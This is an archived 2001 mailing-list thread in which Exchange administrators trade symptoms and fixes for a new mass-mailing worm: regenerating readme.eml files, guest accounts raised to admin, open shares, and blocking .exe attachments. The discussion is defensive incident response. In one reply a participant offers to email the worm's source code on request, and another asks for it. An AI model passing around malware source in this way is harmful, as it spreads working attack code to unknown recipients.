They are mentioned in the NAI website. I've also seen mention of WAV and COM files. -Peter -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 12:37 To: Exchange Discussions Subject: RE: New Virus / Worm ?? has anybody seen anything Official about the .eml files? I've just heard anecdotal evidence about them. -Michèle Immigration site: http://LadySun1969.tripod.com Our new 2001 Miata: http://members.cardomain.com/bpituley Tiggercam: http://www.tiggercam.co.uk - Why do they put pictures of criminals up in the Post Office? What are we supposed to do . . . write to these men? Why don't they just put their pictures on the postage stamps so the mailmen could look for them while they delivered the mail? - -Original Message- From: Daniel Deward [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 3:37 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? If you block EXE's there is no need to wait for updates. For more information, visit http://www.cmsconnect.com Dan -Original Message- From: Pfefferkorn, Pete (PFEFFEPE) [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 3:16 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? Yes, NAI released an extra.dat Still waiting for trend to put out an update. Pete Pfefferkorn Senior Systems Engineer/Mail Administrator University of Cincinnati 51 Goodman Street Cincinnati, OH 45221 Phone - (513) 556-9076 Fax - (513) 556-2042 -Original Message- From: Etts, Russell [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 2:51 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? Does anyone have any more info on this?? Does NAI have an update? I can't get through to them. Thanks Russell -Original Message- From: John Bricher [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 12:33 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? On the servers that were infected at our company, we found a mmc.exe that was running in c:\winnt. This appeared to be regenerating the readme.eml files. We killed the process, deleted the file, and deleted the .eml files. This appears to have worked for now. Not sure how to stop it from happening again. John Bricher Windows NT Engineer Cybear, Inc. 561-999-3549 [EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] __ This message is private or privileged. If you are not the person for whom this message is intended, please delete it and notify me immediately, and please do not copy or send this message to anyone else. _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED]
RE: New Virus / Worm ??
I believe readme.eml is loaded to an infected IIS website as an attachment to every page in the site. When the infected site is accessed, it is downloaded as an .exe This is what I see on securityfocus.com and the noted anti-virus sites. John Allhiser MCSE CCNA Network Engineer Business Men's Assurance -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 2:37 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? has anybody seen anything Official about the .eml files? I've just heard anecdotal evidence about them. -Michèle Immigration site: http://LadySun1969.tripod.com Our new 2001 Miata: http://members.cardomain.com/bpituley Tiggercam: http://www.tiggercam.co.uk - Why do they put pictures of criminals up in the Post Office? What are we supposed to do . . . write to these men? Why don't they just put their pictures on the postage stamps so the mailmen could look for them while they delivered the mail? - -Original Message- From: Daniel Deward [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 3:37 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? If you block EXE's there is no need to wait for updates. For more information, visit http://www.cmsconnect.com Dan -Original Message- From: Pfefferkorn, Pete (PFEFFEPE) [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 3:16 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? Yes, NAI released an extra.dat Still waiting for trend to put out an update. Pete Pfefferkorn Senior Systems Engineer/Mail Administrator University of Cincinnati 51 Goodman Street Cincinnati, OH 45221 Phone - (513) 556-9076 Fax - (513) 556-2042 -Original Message- From: Etts, Russell [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 2:51 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? Does anyone have any more info on this?? Does NAI have an update? I can't get through to them. Thanks Russell -Original Message- From: John Bricher [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 12:33 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? On the servers that were infected at our company, we found a mmc.exe that was running in c:\winnt. This appeared to be regenerating the readme.eml files. We killed the process, deleted the file, and deleted the .eml files. This appears to have worked for now. Not sure how to stop it from happening again. John Bricher Windows NT Engineer Cybear, Inc. 561-999-3549 [EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED]
RE: New Virus / Worm ??
you got a link for where they're mentioned? I looked at nai.com and at sybari.com sophos.com and can't find anything about them. maybe i'm just blind. -Michèle Immigration site: http://LadySun1969.tripod.com Our new 2001 Miata: http://members.cardomain.com/bpituley Tiggercam: http://www.tiggercam.co.uk - Pinky, are you pondering what I'm pondering? Well, I think so Brain, but what if we stick to the seat covers? - -Original Message- From: Durkee, Peter [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 3:42 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? They are mentioned in the NAI website. I've also seen mention of WAV and COM files. -Peter -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 12:37 To: Exchange Discussions Subject: RE: New Virus / Worm ?? has anybody seen anything Official about the .eml files? I've just heard anecdotal evidence about them. -Michèle Immigration site: http://LadySun1969.tripod.com Our new 2001 Miata: http://members.cardomain.com/bpituley Tiggercam: http://www.tiggercam.co.uk - Why do they put pictures of criminals up in the Post Office? What are we supposed to do . . . write to these men? Why don't they just put their pictures on the postage stamps so the mailmen could look for them while they delivered the mail? - -Original Message- From: Daniel Deward [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 3:37 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? If you block EXE's there is no need to wait for updates. For more information, visit http://www.cmsconnect.com Dan -Original Message- From: Pfefferkorn, Pete (PFEFFEPE) [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 3:16 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? Yes, NAI released an extra.dat Still waiting for trend to put out an update. Pete Pfefferkorn Senior Systems Engineer/Mail Administrator University of Cincinnati 51 Goodman Street Cincinnati, OH 45221 Phone - (513) 556-9076 Fax - (513) 556-2042 -Original Message- From: Etts, Russell [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 2:51 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? Does anyone have any more info on this?? Does NAI have an update? I can't get through to them. Thanks Russell -Original Message- From: John Bricher [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 12:33 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? On the servers that were infected at our company, we found a mmc.exe that was running in c:\winnt. This appeared to be regenerating the readme.eml files. We killed the process, deleted the file, and deleted the .eml files. This appears to have worked for now. Not sure how to stop it from happening again. John Bricher Windows NT Engineer Cybear, Inc. 561-999-3549 [EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] __ This message is private or privileged. If you are not the person for whom this message is intended, please delete it and notify me immediately, and please do not copy or send this message to anyone else
RE: New Virus / Worm ??
I've got a file server with a bunch of .eml files - desktop.eml fax1.eml 2.eml professional.eml etc. - all created at the same time in various subdirectories of a public share all the same size all owned by the same person. That sounds suspiciously like this, but I can't find anything definitive about these damn .eml files!! -Michèle Immigration site: http://LadySun1969.tripod.com Our new 2001 Miata: http://members.cardomain.com/bpituley Tiggercam: http://www.tiggercam.co.uk - The fact that no one understands you doesn't mean you're an artist. - -Original Message- From: John Allhiser [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 3:39 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? I believe readme.eml is loaded to an infected IIS website as an attachment to every page in the site. When the infected site is accessed, it is downloaded as an .exe This is what I see on securityfocus.com and the noted anti-virus sites. John Allhiser MCSE CCNA Network Engineer Business Men's Assurance -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 2:37 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? has anybody seen anything Official about the .eml files? I've just heard anecdotal evidence about them. -Michèle Immigration site: http://LadySun1969.tripod.com Our new 2001 Miata: http://members.cardomain.com/bpituley Tiggercam: http://www.tiggercam.co.uk - Why do they put pictures of criminals up in the Post Office? What are we supposed to do . . . write to these men? Why don't they just put their pictures on the postage stamps so the mailmen could look for them while they delivered the mail? - -Original Message- From: Daniel Deward [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 3:37 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? If you block EXE's there is no need to wait for updates. For more information, visit http://www.cmsconnect.com Dan -Original Message- From: Pfefferkorn, Pete (PFEFFEPE) [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 3:16 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? Yes, NAI released an extra.dat Still waiting for trend to put out an update. Pete Pfefferkorn Senior Systems Engineer/Mail Administrator University of Cincinnati 51 Goodman Street Cincinnati, OH 45221 Phone - (513) 556-9076 Fax - (513) 556-2042 -Original Message- From: Etts, Russell [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 2:51 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? Does anyone have any more info on this?? Does NAI have an update? I can't get through to them. Thanks Russell -Original Message- From: John Bricher [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 12:33 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? On the servers that were infected at our company, we found a mmc.exe that was running in c:\winnt. This appeared to be regenerating the readme.eml files. We killed the process, deleted the file, and deleted the .eml files. This appears to have worked for now. Not sure how to stop it from happening again. John Bricher Windows NT Engineer Cybear, Inc. 561-999-3549 [EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List
RE: New Virus / Worm ??
It appears the virus is putting the guest account into the local admin group on the infected server. I am blocking all .exe's I used exmerge to recover all readme.exe's that had already made it past the block. I have installed the new dat from McAfee on all IIS servers. It cleans all the files, but the virus is back within an hour. What a waste of a day! -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 3:47 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? you got a link for where they're mentioned? I looked at nai.com and at sybari.com sophos.com and can't find anything about them. maybe i'm just blind. -Michèle Immigration site: http://LadySun1969.tripod.com Our new 2001 Miata: http://members.cardomain.com/bpituley Tiggercam: http://www.tiggercam.co.uk - Pinky, are you pondering what I'm pondering? Well, I think so Brain, but what if we stick to the seat covers? - -Original Message- From: Durkee, Peter [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 3:42 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? They are mentioned in the NAI website. I've also seen mention of WAV and COM files. -Peter -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 12:37 To: Exchange Discussions Subject: RE: New Virus / Worm ?? has anybody seen anything Official about the .eml files? I've just heard anecdotal evidence about them. -Michèle Immigration site: http://LadySun1969.tripod.com Our new 2001 Miata: http://members.cardomain.com/bpituley Tiggercam: http://www.tiggercam.co.uk - Why do they put pictures of criminals up in the Post Office? What are we supposed to do . . . write to these men? Why don't they just put their pictures on the postage stamps so the mailmen could look for them while they delivered the mail? - -Original Message- From: Daniel Deward [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 3:37 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? If you block EXE's there is no need to wait for updates. For more information, visit http://www.cmsconnect.com Dan -Original Message- From: Pfefferkorn, Pete (PFEFFEPE) [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 3:16 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? Yes, NAI released an extra.dat Still waiting for trend to put out an update. Pete Pfefferkorn Senior Systems Engineer/Mail Administrator University of Cincinnati 51 Goodman Street Cincinnati, OH 45221 Phone - (513) 556-9076 Fax - (513) 556-2042 -Original Message- From: Etts, Russell [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 2:51 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? Does anyone have any more info on this?? Does NAI have an update? I can't get through to them. Thanks Russell -Original Message- From: John Bricher [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 12:33 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? On the servers that were infected at our company, we found a mmc.exe that was running in c:\winnt. This appeared to be regenerating the readme.eml files. We killed the process, deleted the file, and deleted the .eml files. This appears to have worked for now. Not sure how to stop it from happening again. John Bricher Windows NT Engineer Cybear, Inc. 561-999-3549 [EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List
RE: New Virus / Worm ??
I started blocking them about a month ago. We had a user receive one, then when it was opened up it had an .exe in it as an attachment. I decided to block them as I did not want this used as a conduit to bypass our .exe blocking. The good news is that it has worked, I have blocked about 6 or 7 of them today, however I have not seen any instance of readme.exe trying to get through. Oh the fun! Jeff Jeffrey R. Waters Senior Systems Engineer Information Technology, Hanover County -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 3:37 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? has anybody seen anything Official about the .eml files? I've just heard anecdotal evidence about them. -Michèle Immigration site: http://LadySun1969.tripod.com Our new 2001 Miata: http://members.cardomain.com/bpituley Tiggercam: http://www.tiggercam.co.uk - Why do they put pictures of criminals up in the Post Office? What are we supposed to do . . . write to these men? Why don't they just put their pictures on the postage stamps so the mailmen could look for them while they delivered the mail? - -Original Message- From: Daniel Deward [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 3:37 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? If you block EXE's there is no need to wait for updates. For more information, visit http://www.cmsconnect.com Dan -Original Message- From: Pfefferkorn, Pete (PFEFFEPE) [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 3:16 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? Yes, NAI released an extra.dat Still waiting for trend to put out an update. Pete Pfefferkorn Senior Systems Engineer/Mail Administrator University of Cincinnati 51 Goodman Street Cincinnati, OH 45221 Phone - (513) 556-9076 Fax - (513) 556-2042 -Original Message- From: Etts, Russell [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 2:51 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? Does anyone have any more info on this?? Does NAI have an update? I can't get through to them. Thanks Russell -Original Message- From: John Bricher [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 12:33 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? On the servers that were infected at our company, we found a mmc.exe that was running in c:\winnt. This appeared to be regenerating the readme.eml files. We killed the process, deleted the file, and deleted the .eml files. This appears to have worked for now. Not sure how to stop it from happening again. John Bricher Windows NT Engineer Cybear, Inc. 561-999-3549 [EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED]
RE: New Virus / Worm ??
Look here under Removal Instructions: http://vil.nai.com/vil/virusSummary.asp?virus_k=99209 Matt Hoffman -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 3:47 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? you got a link for where they're mentioned? I looked at nai.com and at sybari.com sophos.com and can't find anything about them. maybe i'm just blind. -Michèle Immigration site: http://LadySun1969.tripod.com Our new 2001 Miata: http://members.cardomain.com/bpituley Tiggercam: http://www.tiggercam.co.uk - Pinky, are you pondering what I'm pondering? Well, I think so Brain, but what if we stick to the seat covers? - -Original Message- From: Durkee, Peter [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 3:42 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? They are mentioned in the NAI website. I've also seen mention of WAV and COM files. -Peter -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 12:37 To: Exchange Discussions Subject: RE: New Virus / Worm ?? has anybody seen anything Official about the .eml files? I've just heard anecdotal evidence about them. -Michèle Immigration site: http://LadySun1969.tripod.com Our new 2001 Miata: http://members.cardomain.com/bpituley Tiggercam: http://www.tiggercam.co.uk - Why do they put pictures of criminals up in the Post Office? What are we supposed to do . . . write to these men? Why don't they just put their pictures on the postage stamps so the mailmen could look for them while they delivered the mail? - -Original Message- From: Daniel Deward [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 3:37 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? If you block EXE's there is no need to wait for updates. For more information, visit http://www.cmsconnect.com Dan -Original Message- From: Pfefferkorn, Pete (PFEFFEPE) [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 3:16 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? Yes, NAI released an extra.dat Still waiting for trend to put out an update. Pete Pfefferkorn Senior Systems Engineer/Mail Administrator University of Cincinnati 51 Goodman Street Cincinnati, OH 45221 Phone - (513) 556-9076 Fax - (513) 556-2042 -Original Message- From: Etts, Russell [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 2:51 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? Does anyone have any more info on this?? Does NAI have an update? I can't get through to them. Thanks Russell -Original Message- From: John Bricher [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 12:33 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? On the servers that were infected at our company, we found a mmc.exe that was running in c:\winnt. This appeared to be regenerating the readme.eml files. We killed the process, deleted the file, and deleted the .eml files. This appears to have worked for now. Not sure how to stop it from happening again. John Bricher Windows NT Engineer Cybear, Inc. 561-999-3549 [EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED
RE: New Virus / Worm ??
I wish I didn't know the answer to this one: C:\shared\ -Original Message- From: Erik Sojka [mailto:[EMAIL PROTECTED]] Posted At: Tuesday, September 18, 2001 03:02 PM Posted To: MSExchange Mailing List Conversation: New Virus / Worm ?? Subject: RE: New Virus / Worm ?? What share does it create on an infected machine? _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED]
RE: New Virus / Worm ??
May I have a copy please!! -Original Message- From: Daniel Deward [mailto:[EMAIL PROTECTED]] Sent: 18 September 2001 21:08 To: Exchange Discussions Subject: RE: New Virus / Worm ?? If you want the source code for readme.exe, readme.asm. Send me an e-mail for a copy. It's very interesting! Dan http://www.cmsconnect.com -Original Message- From: Erik Sojka [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 4:02 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? What share does it create on an infected machine? _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] This email has been scanned for all viruses by the Star Internet Virus Screen. The service is provided in partnership with MessageLabs, the email security company. For more information on a higher level of virus protection visit www.star.net.uk This email has been scanned for all viruses by the Star Internet Virus Screen. The service is provided in partnership with MessageLabs, the email security company. For more information on a higher level of virus protection visit www.star.net.uk _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED]
RE: New Virus / Worm ??
sorry!! -Original Message- From: Andrew Pike [mailto:[EMAIL PROTECTED]] Sent: 18 September 2001 21:16 To: Exchange Discussions Subject: RE: New Virus / Worm ?? May I have a copy please!! -Original Message- From: Daniel Deward [mailto:[EMAIL PROTECTED]] Sent: 18 September 2001 21:08 To: Exchange Discussions Subject: RE: New Virus / Worm ?? If you want the source code for readme.exe, readme.asm. Send me an e-mail for a copy. It's very interesting! Dan http://www.cmsconnect.com -Original Message- From: Erik Sojka [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 4:02 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? What share does it create on an infected machine? _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] This email has been scanned for all viruses by the Star Internet Virus Screen. The service is provided in partnership with MessageLabs, the email security company. For more information on a higher level of virus protection visit www.star.net.uk This email has been scanned for all viruses by the Star Internet Virus Screen. The service is provided in partnership with MessageLabs, the email security company. For more information on a higher level of virus protection visit www.star.net.uk _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] This email has been scanned for all viruses by the Star Internet Virus Screen. The service is provided in partnership with MessageLabs, the email security company. For more information on a higher level of virus protection visit www.star.net.uk _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED]
RE: New Virus / Worm ??
I just received an e-mail with this virus/worm. It appears to be not very nice. I use the preview pane in Outlook and it automatically attempted to launch the attachment. For once, I'm glad I had the new security features in Outlook SR-1 that does not allow launching an .exe w/out saving it to the hard drive first. The virus had a subject with 255 characters in it. Methinks there was/is an exploit for subject lines that long. Subject: dbaseconfigatssubsatssubdbase415cachedbdupsmillarddupsdbinfodatacollectcrapo mahaconfig280713busesdupsdbase15adduser4dbase15omaha2baseyearplainviewdbinfo dbsetupnasdatacrapplainviewomaha3genericadduser4westsidedbsetupdblinkexpdbci nitdbasedbaseivmillardomaha From what Symantec and McAfee say, this isn't the worst virus ever, but it's not very nice, either. Worst part, I guess is that it propogates by e-mailing itself out to everybody. It then scans for IIS servers that are not patched for the CodeBlue/Unicode exploit. http://vil.mcafee.com/dispVirus.asp?virus_k=99209; AVERT is currently analyzing this threat and will post more details shortly. This is a mass-mailing worm, which also spreads via open shares, and 